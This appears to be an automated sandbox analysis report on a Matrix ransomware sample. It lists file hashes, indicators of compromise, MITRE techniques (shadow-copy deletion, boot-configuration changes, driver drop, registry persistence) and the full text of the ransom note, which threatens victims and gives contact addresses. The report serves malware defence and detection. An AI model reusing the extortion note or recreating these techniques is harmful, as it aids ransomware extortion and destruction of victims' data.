matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Resubmissions

03-04-2024 17:37

240403-v68g6sga2w 10

Analysis

max time kernel
149s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
SSDEEP

24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\#KOK8_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 18C82E76CF25D842\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 18C82E76CF25D842\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 LD9BQ92W\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\kn\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Documents\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\EdgeUpdate\Log\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mn\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uww4xkgq.Admin\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ca\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\es\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\en_GB\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ru\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fi\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zu\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\USOShared\Logs\System\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\IdentityCRL\production\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{98fb16b8-bf81-4ad5-ab09-8fb51b0893ff}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ml\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Google\Update\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{b3b5370b-aefc-4ec8-8f77-ddfd19022094}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\bn\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\server\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre-1.8\lib\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

6500 bcdedit.exe
6512 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

149 3196 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

K91plEdw64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS K91plEdw64.exe

pid	process
6500	bcdedit.exe
6512	bcdedit.exe

flow	pid	process
149	3196	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	K91plEdw64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

K91plEdw64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	K91plEdw64.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 64 IoCs

Processes:

